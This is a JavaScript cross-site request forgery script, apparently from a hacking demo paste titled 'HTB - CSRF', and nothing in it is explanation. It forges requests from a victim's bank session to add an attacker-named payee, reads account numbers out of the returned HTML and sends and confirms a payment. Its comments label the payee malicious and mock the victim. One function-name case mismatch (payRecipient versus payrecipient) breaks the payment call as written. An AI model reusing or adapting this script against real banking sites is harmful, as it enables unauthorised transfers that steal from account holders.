HTB - CSRF

1. //Define the variables for who we want to give money to
2. var my_first_name = 'Steve'; //first name
3. var my_last_name = 'Meacham'; //last name
4. var my_email = 'pastebinjunk@stevemeacham.me'; //email address
5. var security_question = 'my company'; //security question for  money transfer
6. var security_answer = 'Meacham & Meacham'; //response to security question no spaces allowed
7. var today_day = '31'; //today's day
8. var today_month = '7'; //today's month
9. var today_year = '2013'; //today's year
10. var my_amount = '20'; //amount you want to transfer. Must be at least $10
11.  
12. var from_account; // variable to hold the 'from' account for posting transfer request
13. var to_account; //variable to hold the 'to' account for posting transfer
14. var current_server_response; //not used
15.  
16.  
17.  
18. //generic HTTPObject - can be extended to include IE support
19. function getHTTPObject() {
20.  
21.   var xmlhttp2;
22.  
23.   if (!xmlhttp2 && typeof XMLHttpRequest != 'undefined') {
24.  
25.     try {
26.  
27.       xmlhttp2 = new XMLHttpRequest();
28.  
29.     } catch (e) {
30.  
31.       xmlhttp2 = false;
32.  
33.     }
34.  
35.   }
36.  
37.   return xmlhttp2;
38.  
39. }
40.  
41.  
42. addRecipient(); //adds malicious recipient
43. payRecipient(); //pays malicious recipient
44.  
45. //function to add recipient
46. function addRecipient () {
47.  
48. //First go to payments page
49. sendBankRequest('banksecure/funcs/mainBalance','REQUESTYPE=CheckBalance&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');
50.  
51. //Now go to add recipient page
52. sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addRecipient&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');
53.  
54. //Enter in the info for the recipient that you want to add and give the security question and answer
55. sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addNewRecipient&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&NAME= ' + my_first_name + '+' + my_last_name + '&EMAIL=' + my_email + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer);
56.  
57. //Verify the details of the request
58. sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=verifyRequest&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&NAME= ' + my_first_name + '+' + my_last_name + '&EMAIL=' + my_email + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer + '&VERIFY_RSPNS=OK');
59.  
60.  
61. //recipient is added!
62.  
63. }
64.  
65. function payrecipient() {
66.  
67. var resp;
68.  
69. //Send a request to do an online payment
70. resp = sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=StartPaymentScreen&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');
71.  
72. //Parse out the response to find the unique account values for 'to' and 'from'
73. parseResponseSendrecipient (resp);
74.  
75. //make payment request
76. sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=MakePayment&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&AMOUNT=' + my_amount +'&FROM_ACCT=' + from_account + '&TO_ACCNT=' + to_account + '&DAY=' + today_day +'&MONTH=' + today_month + '&YEAR=' + today_year + '&FREQUENCY=once');
77.  
78. //confirm payment details
79. sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=ConfirmPayment&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&AMOUNT=' + my_amount +'&FROM_ACCT=' + from_account + '&TO_ACCNT=' + to_account + '&DAY=' + today_day +'&MONTH=' + today_month + '&YEAR=' + today_year + '&FREQUENCY=once' + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer + '&VERIFY_RSPNS=OK');
80.  
81. //Payment sent!
82. }
83.  
84.  
85.  
86. //Function to send request to bank
87. function sendBankRequest(my_page, my_post_params) {
88.  //the object that makes it all possible!
89.  var xmlhttp = getHTTPObject();
90.  
91.  
92.  // note the third argument is whether or not the call will be 'asynchronous' - by specifying false we are blocking for the response.
93.  // This of course destroys the first 'A' in AJAX but since we are attacking somebody else who the hell cares!
94.  xmlhttp.open("POST", my_page, false);
95.  
96.  //define headers exactly as they are given in a valid browser-based request
97.  xmlhttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508  Firefox/1.5.0.12');
98.  xmlhttp.setRequestHeader('Accept-Language','en-us,en;q=0.5');
99.  xmlhttp.setRequestHeader('Accept-Charset','ISO-8859-1,utf-8;q=0.7,*;q=0.7');
100.  
101.   //more HTTP headers
102.   xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
103.  
104.   //send the request and return the response
105.   xmlhttp.send(my_post_params);
106.   return xmlhttp.responseText;
107.  
108. }
109.  
110.  
111.  
112. //Search through specific page for to and from accounts
113. //Using this same technique we could pick out an anti-CSRF token
114. //Basically this is just parsing HTML
115. function parseResponseSendrecipient (my_response) {
116.  
117.    
118.    //look through page for the account number they are using for the victim
119.    var from_index = my_response.indexOf('from_account=\"client_val\"');
120.  
121.    from_account = my_response.substring(from_index + 30,my_response.indexOf('>',from_index) - 2);
122.  
123.    //now we look for the to account
124.    var to_index = my_response.indexOf(my_first_name + ' ' + my_last_name);
125.    
126.    //estimate that the value can't be more than 40 characters previous to this
127.    var to_option_index = to_index - 40;
128.    to_option_index = my_response.indexOf('\"', to_option_index);
129.  
130.    to_account = my_response.substring(to_option_index + 1, to_index - 2);
131.  
132. }